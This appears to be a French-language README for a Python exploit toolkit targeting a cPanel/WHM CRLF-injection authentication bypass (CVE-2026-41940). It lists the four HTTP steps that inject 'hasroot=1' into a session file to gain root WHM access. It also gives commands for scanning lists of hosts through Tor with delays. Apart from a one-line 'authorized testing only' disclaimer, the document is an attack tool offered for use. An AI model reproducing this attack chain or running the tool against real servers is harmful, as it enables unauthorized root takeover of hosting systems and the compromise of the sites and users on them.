
cPanel/WHM CVE-2026-41940 exploit d'injection CRLF pour contournement d'authentification
Boîte à outils de test de sécurité cPanel/WHM. Implémente le contournement d'authentification par injection CRLF CVE-2026-41940 et l'élévation de privilèges post-exploitation.
| Script | Objectif |
|---|---|
cpanel_exploit.py | CVE-2026-41940 : injection CRLF → contournement d'authentification WHM → accès root |
Type : Injection CRLF → Contournement d'authentification → RCE root
Affecte : cPanel/WHM < versions corrigées
Attaque : L'injection CRLF pré-authentification dans l'en-tête Basic Auth injecte dans le fichier de session côté serveur, élevant une session non authentifiée au niveau root WHM.
hasroot=1Étape 1 : POST /login/?login_only=1 → crée une session pré-authentification
Étape 2 : GET / Authorization:Basic <CRLF> → injecte hasroot=1, divulgue le jeton cpsess
Étape 3 : GET /scripts2/listaccts → déclenche le gadget de propagation du cache de session
Étape 4 : GET /cpsess[TOKEN]/json-api/version → HTTP 200 + version = ACCÈS ROOT
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # vérification CRLF uniquement, sans élévation de privilèges
Réservé aux tests d'intrusion autorisés.